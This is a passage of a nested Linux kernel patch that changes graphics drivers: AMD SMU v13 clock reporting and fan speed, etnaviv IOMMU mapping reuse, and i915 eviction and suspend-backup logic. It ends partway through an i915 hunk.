+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -28,6 +28,7 @@
+ #define SMU13_DRIVER_IF_VERSION_INV 0xFFFFFFFF
+ #define SMU13_DRIVER_IF_VERSION_YELLOW_CARP 0x04
+ #define SMU13_DRIVER_IF_VERSION_ALDE 0x08
++#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_0 0x34
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_4 0x07
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_5 0x04
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_10 0x32
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 89f0f6eb19f3d..8e4830a311bde 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -289,6 +289,8 @@ int smu_v13_0_check_fw_version(struct smu_context *smu)
+ 		smu->smc_driver_if_version = SMU13_DRIVER_IF_VERSION_ALDE;
+ 		break;
+ 	case IP_VERSION(13, 0, 0):
++		smu->smc_driver_if_version = SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_0;
++		break;
+ 	case IP_VERSION(13, 0, 10):
+ 		smu->smc_driver_if_version = SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_10;
+ 		break;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+index f0121d1716301..b8430601304f0 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_0_ppt.c
+@@ -187,6 +187,8 @@ static struct cmn2asic_mapping smu_v13_0_0_feature_mask_map[SMU_FEATURE_COUNT] =
+ 	FEA_MAP(MEM_TEMP_READ),
+ 	FEA_MAP(ATHUB_MMHUB_PG),
+ 	FEA_MAP(SOC_PCC),
++	[SMU_FEATURE_DPM_VCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
++	[SMU_FEATURE_DPM_DCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_0_table_map[SMU_TABLE_COUNT] = {
+@@ -517,6 +519,23 @@ static int smu_v13_0_0_set_default_dpm_table(struct smu_context *smu)
+ 						     dpm_table);
+ 		if (ret)
+ 			return ret;
++
++		/*
++		 * Update the reported maximum shader clock to the value
++		 * which is guaranteed to be achievable on all cards. This
++		 * is aligned with the Windows setting. Since that value
++		 * may not be the peak frequency the card can achieve, it
++		 * is normal for a real-time clock reading to exceed this
++		 * labelled maximum clock frequency (for example in the
++		 * pp_dpm_sclk sysfs output).
++		 */
++		if (skutable->DriverReportedClocks.GameClockAc &&
++		    (dpm_table->dpm_levels[dpm_table->count - 1].value >
++		    skutable->DriverReportedClocks.GameClockAc)) {
++			dpm_table->dpm_levels[dpm_table->count - 1].value =
++				skutable->DriverReportedClocks.GameClockAc;
++			dpm_table->max = skutable->DriverReportedClocks.GameClockAc;
++		}
+ 	} else {
+ 		dpm_table->count = 1;
+ 		dpm_table->dpm_levels[0].value = smu->smu_table.boot_values.gfxclk / 100;
+@@ -779,6 +798,57 @@ static int smu_v13_0_0_get_smu_metrics_data(struct smu_context *smu,
+ 	return ret;
+ }
+ 
++static int smu_v13_0_0_get_dpm_ultimate_freq(struct smu_context *smu,
++					     enum smu_clk_type clk_type,
++					     uint32_t *min,
++					     uint32_t *max)
++{
++	struct smu_13_0_dpm_context *dpm_context =
++		smu->smu_dpm.dpm_context;
++	struct smu_13_0_dpm_table *dpm_table;
++
++	switch (clk_type) {
++	case SMU_MCLK:
++	case SMU_UCLK:
++		/* uclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.uclk_table;
++		break;
++	case SMU_GFXCLK:
++	case SMU_SCLK:
++		/* gfxclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.gfx_table;
++		break;
++	case SMU_SOCCLK:
++		/* socclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.soc_table;
++		break;
++	case SMU_FCLK:
++		/* fclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.fclk_table;
++		break;
++	case SMU_VCLK:
++	case SMU_VCLK1:
++		/* vclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.vclk_table;
++		break;
++	case SMU_DCLK:
++	case SMU_DCLK1:
++		/* dclk dpm table */
++		dpm_table = &dpm_context->dpm_tables.dclk_table;
++		break;
++	default:
++		dev_err(smu->adev->dev, "Unsupported clock type!\n");
++		return -EINVAL;
++	}
++
++	if (min)
++		*min = dpm_table->min;
++	if (max)
++		*max = dpm_table->max;
++
++	return 0;
++}
++
+ static int smu_v13_0_0_read_sensor(struct smu_context *smu,
+ 				   enum amd_pp_sensors sensor,
+ 				   void *data,
+@@ -1281,9 +1351,17 @@ static int smu_v13_0_0_populate_umd_state_clk(struct smu_context *smu)
+ 				&dpm_context->dpm_tables.fclk_table;
+ 	struct smu_umd_pstate_table *pstate_table =
+ 				&smu->pstate_table;
++	struct smu_table_context *table_context = &smu->smu_table;
++	PPTable_t *pptable = table_context->driver_pptable;
++	DriverReportedClocks_t driver_clocks =
++			pptable->SkuTable.DriverReportedClocks;
+ 
+ 	pstate_table->gfxclk_pstate.min = gfx_table->min;
+-	pstate_table->gfxclk_pstate.peak = gfx_table->max;
++	if (driver_clocks.GameClockAc &&
++	    (driver_clocks.GameClockAc < gfx_table->max))
++		pstate_table->gfxclk_pstate.peak = driver_clocks.GameClockAc;
++	else
++		pstate_table->gfxclk_pstate.peak = gfx_table->max;
+ 
+ 	pstate_table->uclk_pstate.min = mem_table->min;
+ 	pstate_table->uclk_pstate.peak = mem_table->max;
+@@ -1300,12 +1378,12 @@ static int smu_v13_0_0_populate_umd_state_clk(struct smu_context *smu)
+ 	pstate_table->fclk_pstate.min = fclk_table->min;
+ 	pstate_table->fclk_pstate.peak = fclk_table->max;
+ 
+-	/*
+-	 * For now, just use the mininum clock frequency.
+-	 * TODO: update them when the real pstate settings available
+-	 */
+-	pstate_table->gfxclk_pstate.standard = gfx_table->min;
+-	pstate_table->uclk_pstate.standard = mem_table->min;
++	if (driver_clocks.BaseClockAc &&
++	    driver_clocks.BaseClockAc < gfx_table->max)
++		pstate_table->gfxclk_pstate.standard = driver_clocks.BaseClockAc;
++	else
++		pstate_table->gfxclk_pstate.standard = gfx_table->max;
++	pstate_table->uclk_pstate.standard = mem_table->max;
+ 	pstate_table->socclk_pstate.standard = soc_table->min;
+ 	pstate_table->vclk_pstate.standard = vclk_table->min;
+ 	pstate_table->dclk_pstate.standard = dclk_table->min;
+@@ -1339,12 +1417,23 @@ out:
+ static int smu_v13_0_0_get_fan_speed_pwm(struct smu_context *smu,
+ 					 uint32_t *speed)
+ {
++	int ret;
++
+ 	if (!speed)
+ 		return -EINVAL;
+ 
+-	return smu_v13_0_0_get_smu_metrics_data(smu,
+-						METRICS_CURR_FANPWM,
+-						speed);
++	ret = smu_v13_0_0_get_smu_metrics_data(smu,
++					       METRICS_CURR_FANPWM,
++					       speed);
++	if (ret) {
++		dev_err(smu->adev->dev, "Failed to get fan speed(PWM)!");
++		return ret;
++	}
++
++	/* Convert the PMFW output, which is in percent, to a 0-255 PWM value */
++	*speed = MIN(*speed * 255 / 100, 255);
++
++	return 0;
+ }
+ 
+ static int smu_v13_0_0_get_fan_speed_rpm(struct smu_context *smu,
+@@ -1813,7 +1902,7 @@ static const struct pptable_funcs smu_v13_0_0_ppt_funcs = {
+ 	.get_enabled_mask = smu_cmn_get_enabled_mask,
+ 	.dpm_set_vcn_enable = smu_v13_0_set_vcn_enable,
+ 	.dpm_set_jpeg_enable = smu_v13_0_set_jpeg_enable,
+-	.get_dpm_ultimate_freq = smu_v13_0_get_dpm_ultimate_freq,
++	.get_dpm_ultimate_freq = smu_v13_0_0_get_dpm_ultimate_freq,
+ 	.get_vbios_bootup_values = smu_v13_0_get_vbios_bootup_values,
+ 	.read_sensor = smu_v13_0_0_read_sensor,
+ 	.feature_is_enabled = smu_cmn_feature_is_enabled,
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index 39deb06a86ba3..222924363a681 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -189,6 +189,8 @@ static struct cmn2asic_mapping smu_v13_0_7_feature_mask_map[SMU_FEATURE_COUNT] =
+ 	FEA_MAP(MEM_TEMP_READ),
+ 	FEA_MAP(ATHUB_MMHUB_PG),
+ 	FEA_MAP(SOC_PCC),
++	[SMU_FEATURE_DPM_VCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
++	[SMU_FEATURE_DPM_DCLK_BIT] = {1, FEATURE_MM_DPM_BIT},
+ };
+ 
+ static struct cmn2asic_mapping smu_v13_0_7_table_map[SMU_TABLE_COUNT] = {
+@@ -1359,12 +1361,23 @@ static int smu_v13_0_7_populate_umd_state_clk(struct smu_context *smu)
+ static int smu_v13_0_7_get_fan_speed_pwm(struct smu_context *smu,
+ 					 uint32_t *speed)
+ {
++	int ret;
++
+ 	if (!speed)
+ 		return -EINVAL;
+ 
+-	return smu_v13_0_7_get_smu_metrics_data(smu,
+-						METRICS_CURR_FANPWM,
+-						speed);
++	ret = smu_v13_0_7_get_smu_metrics_data(smu,
++					       METRICS_CURR_FANPWM,
++					       speed);
++	if (ret) {
++		dev_err(smu->adev->dev, "Failed to get fan speed(PWM)!");
++		return ret;
++	}
++
++	/* Convert the PMFW output, which is in percent, to a 0-255 PWM value */
++	*speed = MIN(*speed * 255 / 100, 255);
++
++	return 0;
+ }
+ 
+ static int smu_v13_0_7_get_fan_speed_rpm(struct smu_context *smu,
+diff --git a/drivers/gpu/drm/drm_connector.c b/drivers/gpu/drm/drm_connector.c
+index 61c29ce74b035..27de2a97f1d11 100644
+--- a/drivers/gpu/drm/drm_connector.c
++++ b/drivers/gpu/drm/drm_connector.c
+@@ -582,6 +582,9 @@ void drm_connector_cleanup(struct drm_connector *connector)
+ 	mutex_destroy(&connector->mutex);
+ 
+ 	memset(connector, 0, sizeof(*connector));
++
++	if (dev->registered)
++		drm_sysfs_hotplug_event(dev);
+ }
+ EXPORT_SYMBOL(drm_connector_cleanup);
+ 
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_gem.c b/drivers/gpu/drm/etnaviv/etnaviv_gem.c
+index cc386f8a7116e..5cf13e52f7c94 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_gem.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_gem.c
+@@ -258,7 +258,12 @@ struct etnaviv_vram_mapping *etnaviv_gem_mapping_get(
+ 		if (mapping->use == 0) {
+ 			mutex_lock(&mmu_context->lock);
+ 			if (mapping->context == mmu_context)
+-				mapping->use += 1;
++				if (va && mapping->iova != va) {
++					etnaviv_iommu_reap_mapping(mapping);
++					mapping = NULL;
++				} else {
++					mapping->use += 1;
++				}
+ 			else
+ 				mapping = NULL;
+ 			mutex_unlock(&mmu_context->lock);
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_mmu.c b/drivers/gpu/drm/etnaviv/etnaviv_mmu.c
+index dc1aa738c4f18..55479cb8b1ac3 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_mmu.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_mmu.c
+@@ -135,6 +135,19 @@ static void etnaviv_iommu_remove_mapping(struct etnaviv_iommu_context *context,
+ 	drm_mm_remove_node(&mapping->vram_node);
+ }
+ 
++void etnaviv_iommu_reap_mapping(struct etnaviv_vram_mapping *mapping)
++{
++	struct etnaviv_iommu_context *context = mapping->context;
++
++	lockdep_assert_held(&context->lock);
++	WARN_ON(mapping->use);
++
++	etnaviv_iommu_remove_mapping(context, mapping);
++	etnaviv_iommu_context_put(mapping->context);
++	mapping->context = NULL;
++	list_del_init(&mapping->mmu_node);
++}
++
+ static int etnaviv_iommu_find_iova(struct etnaviv_iommu_context *context,
+ 				   struct drm_mm_node *node, size_t size)
+ {
+@@ -202,10 +215,7 @@ static int etnaviv_iommu_find_iova(struct etnaviv_iommu_context *context,
+ 		 * this mapping.
+ 		 */
+ 		list_for_each_entry_safe(m, n, &list, scan_node) {
+-			etnaviv_iommu_remove_mapping(context, m);
+-			etnaviv_iommu_context_put(m->context);
+-			m->context = NULL;
+-			list_del_init(&m->mmu_node);
++			etnaviv_iommu_reap_mapping(m);
+ 			list_del_init(&m->scan_node);
+ 		}
+ 
+@@ -257,10 +267,7 @@ static int etnaviv_iommu_insert_exact(struct etnaviv_iommu_context *context,
+ 	}
+ 
+ 	list_for_each_entry_safe(m, n, &scan_list, scan_node) {
+-		etnaviv_iommu_remove_mapping(context, m);
+-		etnaviv_iommu_context_put(m->context);
+-		m->context = NULL;
+-		list_del_init(&m->mmu_node);
++		etnaviv_iommu_reap_mapping(m);
+ 		list_del_init(&m->scan_node);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_mmu.h b/drivers/gpu/drm/etnaviv/etnaviv_mmu.h
+index e4a0b7d09c2ea..c01a147f0dfdd 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_mmu.h
++++ b/drivers/gpu/drm/etnaviv/etnaviv_mmu.h
+@@ -91,6 +91,7 @@ int etnaviv_iommu_map_gem(struct etnaviv_iommu_context *context,
+ 	struct etnaviv_vram_mapping *mapping, u64 va);
+ void etnaviv_iommu_unmap_gem(struct etnaviv_iommu_context *context,
+ 	struct etnaviv_vram_mapping *mapping);
++void etnaviv_iommu_reap_mapping(struct etnaviv_vram_mapping *mapping);
+ 
+ int etnaviv_iommu_get_suballoc_va(struct etnaviv_iommu_context *ctx,
+ 				  struct etnaviv_vram_mapping *mapping,
+diff --git a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+index 75e8cc4337c93..fce69fa446d58 100644
+--- a/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
++++ b/drivers/gpu/drm/i915/display/intel_dsi_vbt.c
+@@ -137,9 +137,9 @@ static enum port intel_dsi_seq_port_to_port(struct intel_dsi *intel_dsi,
+ 		return ffs(intel_dsi->ports) - 1;
+ 
+ 	if (seq_port) {
+-		if (intel_dsi->ports & PORT_B)
++		if (intel_dsi->ports & BIT(PORT_B))
+ 			return PORT_B;
+-		else if (intel_dsi->ports & PORT_C)
++		else if (intel_dsi->ports & BIT(PORT_C))
+ 			return PORT_C;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c b/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c
+index 845023c14eb36..f461e34cc5f07 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_execbuffer.c
+@@ -729,32 +729,69 @@ static int eb_reserve(struct i915_execbuffer *eb)
+ 	bool unpinned;
+ 
+ 	/*
+-	 * Attempt to pin all of the buffers into the GTT.
+-	 * This is done in 2 phases:
++	 * We have one or more buffers that we couldn't bind, which could be due to
++	 * various reasons. To resolve this we have 4 passes, with every next
++	 * level turning the screws tighter:
+ 	 *
+-	 * 1. Unbind all objects that do not match the GTT constraints for
+-	 *    the execbuffer (fenceable, mappable, alignment etc).
+-	 * 2. Bind new objects.
++	 * 0. Unbind all objects that do not match the GTT constraints for the
++	 * execbuffer (fenceable, mappable, alignment etc). Bind all new
++	 * objects.  This avoids unnecessary unbinding of later objects in order
++	 * to make room for the earlier objects *unless* we need to defragment.
+ 	 *
+-	 * This avoid unnecessary unbinding of later objects in order to make
+-	 * room for the earlier objects *unless* we need to defragment.
++	 * 1. Reorder the buffers, where objects with the most restrictive
++	 * placement requirements go first (ignoring fixed location buffers for
++	 * now).  For example, objects needing the mappable aperture (the first
++	 * 256M of GTT) should go first vs objects that can be placed just
++	 * about anywhere. Repeat the previous pass.
+ 	 *
+-	 * Defragmenting is skipped if all objects are pinned at a fixed location.
++	 * 2. Consider buffers that are pinned at a fixed location. Also try to
++	 * evict the entire VM this time, leaving only objects that we were
++	 * unable to lock. Try again to bind the buffers. (still using the new
++	 * buffer order).
++	 *
++	 * 3. We likely have object lock contention for one or more stubborn
++	 * objects in the VM, for which we need to evict to make forward
++	 * progress (perhaps we are fighting the shrinker?). When evicting the
++	 * VM this time around, anything that we can't lock we now track using
++	 * the busy_bo, using the full lock (after dropping the vm->mutex to
++	 * prevent deadlocks), instead of trylock. We then continue to evict the
++	 * VM, this time with the stubborn object locked, which we can now
++	 * hopefully unbind (if still bound in the VM). Repeat until the VM is
++	 * evicted. Finally we should be able to bind everything.
+ 	 */
+-	for (pass = 0; pass <= 2; pass++) {
++	for (pass = 0; pass <= 3; pass++) {
+ 		int pin_flags = PIN_USER | PIN_VALIDATE;
+ 
+ 		if (pass == 0)
+ 			pin_flags |= PIN_NONBLOCK;
+ 
+ 		if (pass >= 1)
+-			unpinned = eb_unbind(eb, pass == 2);
++			unpinned = eb_unbind(eb, pass >= 2);
+ 
+ 		if (pass == 2) {
+ 			err = mutex_lock_interruptible(&eb->context->vm->mutex);
+ 			if (!err) {
+-				err = i915_gem_evict_vm(eb->context->vm, &eb->ww);
++				err = i915_gem_evict_vm(eb->context->vm, &eb->ww, NULL);
++				mutex_unlock(&eb->context->vm->mutex);
++			}
++			if (err)
++				return err;
++		}
++
++		if (pass == 3) {
++retry:
++			err = mutex_lock_interruptible(&eb->context->vm->mutex);
++			if (!err) {
++				struct drm_i915_gem_object *busy_bo = NULL;
++
++				err = i915_gem_evict_vm(eb->context->vm, &eb->ww, &busy_bo);
+ 				mutex_unlock(&eb->context->vm->mutex);
++				if (err && busy_bo) {
++					err = i915_gem_object_lock(busy_bo, &eb->ww);
++					i915_gem_object_put(busy_bo);
++					if (!err)
++						goto retry;
++				}
+ 			}
+ 			if (err)
+ 				return err;
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_mman.c b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+index e63329bc80659..354c1d6dab846 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_mman.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_mman.c
+@@ -369,7 +369,7 @@ retry:
+ 		if (vma == ERR_PTR(-ENOSPC)) {
+ 			ret = mutex_lock_interruptible(&ggtt->vm.mutex);
+ 			if (!ret) {
+-				ret = i915_gem_evict_vm(&ggtt->vm, &ww);
++				ret = i915_gem_evict_vm(&ggtt->vm, &ww, NULL);
+ 				mutex_unlock(&ggtt->vm.mutex);
+ 			}
+ 			if (ret)
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_object.c b/drivers/gpu/drm/i915/gem/i915_gem_object.c
+index 369006c5317f2..a40bc17acead8 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_object.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_object.c
+@@ -761,6 +761,9 @@ bool i915_gem_object_needs_ccs_pages(struct drm_i915_gem_object *obj)
+ 	if (!HAS_FLAT_CCS(to_i915(obj->base.dev)))
+ 		return false;
+ 
++	if (obj->flags & I915_BO_ALLOC_CCS_AUX)
++		return true;
++
+ 	for (i = 0; i < obj->mm.n_placements; i++) {
+ 		/* Compression is not allowed for the objects with smem placement */
+ 		if (obj->mm.placements[i]->type == INTEL_MEMORY_SYSTEM)
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_object_types.h b/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
+index d0d6772e6f36a..ab4c2f90a5643 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
+@@ -327,16 +327,18 @@ struct drm_i915_gem_object {
+  * dealing with userspace objects the CPU fault handler is free to ignore this.
+  */
+ #define I915_BO_ALLOC_GPU_ONLY	  BIT(6)
++#define I915_BO_ALLOC_CCS_AUX	  BIT(7)
+ #define I915_BO_ALLOC_FLAGS (I915_BO_ALLOC_CONTIGUOUS | \
+ 			     I915_BO_ALLOC_VOLATILE | \
+ 			     I915_BO_ALLOC_CPU_CLEAR | \
+ 			     I915_BO_ALLOC_USER | \
+ 			     I915_BO_ALLOC_PM_VOLATILE | \
+ 			     I915_BO_ALLOC_PM_EARLY | \
+-			     I915_BO_ALLOC_GPU_ONLY)
+-#define I915_BO_READONLY          BIT(7)
+-#define I915_TILING_QUIRK_BIT     8 /* unknown swizzling; do not release! */
+-#define I915_BO_PROTECTED         BIT(9)
++			     I915_BO_ALLOC_GPU_ONLY | \
++			     I915_BO_ALLOC_CCS_AUX)
++#define I915_BO_READONLY          BIT(8)
++#define I915_TILING_QUIRK_BIT     9 /* unknown swizzling; do not release! */
++#define I915_BO_PROTECTED         BIT(10)
+ 	/**
+ 	 * @mem_flags - Mutable placement-related flags
+ 	 *
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_ttm_pm.c b/drivers/gpu/drm/i915/gem/i915_gem_ttm_pm.c
+index 07e49f22f2de3..7e67742bc65e0 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_ttm_pm.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_ttm_pm.c
+@@ -50,6 +50,7 @@ static int i915_ttm_backup(struct i915_gem_apply_to_region *apply,
+ 		container_of(bo->bdev, typeof(*i915), bdev);
+ 	struct drm_i915_gem_object *backup;
+ 	struct ttm_operation_ctx ctx = {};
++	unsigned int flags;
+ 	int err = 0;
+ 
+ 	if (bo->resource->mem_type == I915_PL_SYSTEM || obj->ttm.backup)
+@@ -65,7 +66,22 @@ static int i915_ttm_backup(struct i915_gem_apply_to_region *apply,
+ 	if (obj->flags & I915_BO_ALLOC_PM_VOLATILE)
+ 		return 0;
+ 
+-	backup = i915_gem_object_create_shmem(i915, obj->base.size);
++	/*
++	 * It seems that we might have some framebuffers still pinned at this
++	 * stage, but for such objects we might also need to deal with the CCS
++	 * aux state. Make sure we force the save/restore of the CCS state;
++	 * otherwise we might observe display corruption when returning from
++	 * suspend.
++	 */
++	flags = 0;
++	if (i915_gem_object_needs_ccs_pages(obj)) {
++		WARN_ON_ONCE(!i915_gem_object_is_framebuffer(obj));
++		WARN_ON_ONCE(!pm_apply->allow_gpu);
++
++		flags = I915_BO_ALLOC_CCS_AUX;
++	}
++	backup = i915_gem_object_create_region(i915->mm.regions[INTEL_REGION_SMEM],
++					       obj->base.size, 0, flags);
+ 	if (IS_ERR(backup))
+ 		return PTR_ERR(backup);
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_migrate.c b/drivers/gpu/drm/i915/gt/intel_migrate.c
+index aaaf1906026c1..ee072c7d62eb1 100644
+--- a/drivers/gpu/drm/i915/gt/intel_migrate.c
++++ b/drivers/gpu/drm/i915/gt/intel_migrate.c
+@@ -341,6 +341,16 @@ static int emit_no_arbitration(struct i915_request *rq)
+ 	return 0;
+ }
+ 
++static int max_pte_pkt_size(struct i915_request *rq, int pkt)
++{
++	struct intel_ring *ring = rq->ring;
++
++	pkt = min_t(int, pkt, (ring->space - rq->reserved_space) / sizeof(u32) + 5);
++	pkt = min_t(int, pkt, (ring->size - ring->emit) / sizeof(u32) + 5);
++
++	return pkt;
++}
++
+ static int emit_pte(struct i915_request *rq,
+ 		    struct sgt_dma *it,
+ 		    enum i915_cache_level cache_level,
+@@ -387,8 +397,7 @@ static int emit_pte(struct i915_request *rq,
+ 		return PTR_ERR(cs);
+ 
+ 	/* Pack as many PTE updates as possible into a single MI command */
+-	pkt = min_t(int, dword_length, ring->space / sizeof(u32) + 5);
+-	pkt = min_t(int, pkt, (ring->size - ring->emit) / sizeof(u32) + 5);
++	pkt = max_pte_pkt_size(rq, dword_length);
+ 
+ 	hdr = cs;
+ 	*cs++ = MI_STORE_DATA_IMM | REG_BIT(21); /* as qword elements */
+@@ -421,8 +430,7 @@ static int emit_pte(struct i915_request *rq,
+ 				}
+ 			}
+ 
+-			pkt = min_t(int, dword_rem, ring->space / sizeof(u32) + 5);
+-			pkt = min_t(int, pkt, (ring->size - ring->emit) / sizeof(u32) + 5);
++			pkt = max_pte_pkt_size(rq, dword_rem);
+ 
+ 			hdr = cs;
+ 			*cs++ = MI_STORE_DATA_IMM | REG_BIT(21);
+diff --git a/drivers/gpu/drm/i915/i915_gem_evict.c b/drivers/gpu/drm/i915/i915_gem_evict.c
+index f025ee4fa5261..a4b4d9b7d26c7 100644
+--- a/drivers/gpu/drm/i915/i915_gem_evict.c
++++ b/drivers/gpu/drm/i915/i915_gem_evict.c
+@@ -416,6 +416,11 @@ int i915_gem_evict_for_node(struct i915_address_space *vm,
+  * @vm: Address space to cleanse
+  * @ww: An optional struct i915_gem_ww_ctx. If not NULL, i915_gem_evict_vm
+  * will be able to evict vma's locked by the ww as well.
++ * @busy_bo: Optional pointer to struct drm_i915_gem_object. If not NULL and
++ * i915_gem_evict_vm() is unable to trylock an object for eviction, then
++ * @busy_bo will point to it and -EBUSY is returned. The caller must drop
++ * the vm->mutex before trying again to acquire the contended lock. The
++ * caller also owns a reference to the object.
+  *
+  * This function evicts all vmas from a vm.
+  *
+@@ -425,7 +430,8 @@ int i915_gem_evict_for_node(struct i915_address_space *vm,
+  * To clarify: This is for freeing up virtual address space, not for freeing
+  * memory in e.g. the shrinker.
+  */
+-int i915_gem_evict_vm(struct i915_address_space *vm, struct i915_gem_ww_ctx *ww)
++int i915_gem_evict_vm(struct i915_address_space *vm, struct i915_gem_ww_ctx *ww,
++		      struct drm_i915_gem_object **busy_bo)
+ {
+ 	int ret = 0;
+ 
+@@ -457,15 +463,22 @@ int i915_gem_evict_vm(struct i915_address_space *vm, struct i915_gem_ww_ctx *ww)
+ 			 * the resv is shared among multiple objects, we still
+ 			 * need the object ref.
+ 			 */
+-			if (dying_vma(vma) ||
++			if (!i915_gem_object_get_rcu(vma->obj) ||
+ 			    (ww && (dma_resv_locking_ctx(vma->obj->base.resv) == &ww->ctx))) {
+ 				__i915_vma_pin(vma);
+ 				list_add(&vma->evict_link, &locked_eviction_list);
+ 				continue;
+ 			}
+ 
+-			if (!i915_gem_object_trylock(vma->obj, ww))
++			if (!i915_gem_object_trylock(vma->obj, ww)) {
++				if (busy_bo) {
++					*busy_bo = vma->obj; /* holds ref */
++					ret = -EBUSY;
++					break;
++				}
++				i915_gem_object_put(vma->obj);
+ 				continue;
++			}
+ 
+ 			__i915_vma_pin(vma);
+ 			list_add(&vma->evict_link, &eviction_list);
+@@ -473,25 +486,29 @@ int i915_gem_evict_vm(struct i915_address_space *vm, struct i915_gem_ww_ctx *ww)
+ 		if (list_empty(&eviction_list) && list_empty(&locked_eviction_list))
+ 			break;
+ 
+-		ret = 0;
+ 		/* Unbind locked objects first, before unlocking the eviction_list */
+ 		list_for_each_entry_safe(vma, vn, &locked_eviction_list, evict_link) {
+ 			__i915_vma_unpin(vma);
+ 
+-			if (ret == 0)
++			if (ret == 0) {
+ 				ret = __i915_vma_unbind(vma);
+-			if (ret != -EINTR) /* "Get me out of here!" */
+-				ret = 0;
++				if (ret != -EINTR) /* "Get me out of here!" */
++					ret = 0;
++			}
++			if (!dying_vma(vma))
++				i915_gem_object_put(vma->obj);
+ 		}
+ 
+ 		list_for_each_entry_safe(vma, vn, &eviction_list, evict_link) {
+ 			__i915_vma_unpin(vma);
+-			if (ret == 0)
++			if (ret == 0) {
+ 				ret = __i915_vma_unbind(vma);
+-			if (ret != -EINTR) /* "Get me out of here!" */
+-				ret = 0;
++				if (ret != -EINTR) /* "Get me out of here!" */
++					ret = 0;
++			}
+ 
+ 			i915_gem_object_unlock(vma->obj);
++			i915_gem_object_put(vma->obj);
+ 		}
+ 	} while (ret == 0);
+ 
+diff --git a/drivers/gpu/drm/i915/i915_gem_evict.h b/drivers/gpu/drm/i915/i915_gem_evict.h
+index e593c530f9bd7..bf0ee0e4fe608 100644
+--- a/drivers/gpu/drm/i915/i915_gem_evict.h
++++ b/drivers/gpu/drm/i915/i915_gem_evict.h
+@@ -11,6 +11,7 @@
+ struct drm_mm_node;
+ struct i915_address_space;
+ struct i915_gem_ww_ctx;
++struct drm_i915_gem_object;
+ 
+ int __must_check i915_gem_evict_something(struct i915_address_space *vm,
+ 					  struct i915_gem_ww_ctx *ww,
+@@ -23,6 +24,7 @@ int __must_check i915_gem_evict_for_node(struct i915_address_space *vm,
+ 					 struct drm_mm_node *node,
+ 					 unsigned int flags);
+ int i915_gem_evict_vm(struct i915_address_space *vm,
+-		      struct i915_gem_ww_ctx *ww);
++		      struct i915_gem_ww_ctx *ww,
++		      struct drm_i915_gem_object **busy_bo);
+ 
+ #endif /* __I915_GEM_EVICT_H__ */
+diff --git a/drivers/gpu/drm/i915/i915_vma.c b/drivers/gpu/drm/i915/i915_vma.c
+index f17c09ead7d77..4d06875de14a1 100644
+--- a/drivers/gpu/drm/i915/i915_vma.c
++++ b/drivers/gpu/drm/i915/i915_vma.c
+@@ -1569,7 +1569,7 @@ static int __i915_ggtt_pin(struct i915_vma *vma, struct i915_gem_ww_ctx *ww,
+ 			 * locked objects when called from execbuf when pinning
+ 			 * is removed. This would probably regress badly.
+ 			 */
+-			i915_gem_evict_vm(vm, NULL);
